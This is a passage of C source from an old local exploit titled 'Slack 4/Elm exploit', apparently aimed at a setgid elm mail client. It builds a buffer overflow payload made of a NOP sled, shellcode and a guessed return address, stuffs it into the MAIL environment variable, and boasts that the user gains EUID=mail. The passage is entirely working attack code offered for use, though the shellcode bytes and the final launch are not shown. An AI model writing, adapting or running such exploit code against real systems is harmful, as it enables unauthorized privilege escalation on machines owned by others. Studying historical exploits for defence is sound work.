if(!(thaCode = (char *) malloc(NUMNOPS+sizeof(shellcode)+5))) {
fprintf(stderr, "Contact your admin and tell him to buy more
RAM\n");
exit(-1);
}
addy = get_sp() - offset;
printf("/-----------------------------------------------\\\n");
printf("| Slack 4/Elm exploit - Scrippie |\n");
printf("\\-----------------------------------------------/\n");
printf("Assuming sgid(elm) = %d\n", (int) gid);
printf("Using ret addr = %x\n", addy);
printf("You're now EUID=mail, take care :-p\n");
printf("Please run \"reset\" when this works\n");
sleep(4);
memset(thaCode, 0x90, NUMNOPS);
thaCode[NUMNOPS] = 0x00; // Set to NULL to make strcat() work
strcat(thaCode, shellcode);
memcpy(thaCode + strlen(thaCode), (void *) &addy, 4);
setenv("MAIL", thaCode, 1); // We're going to be nasty now :)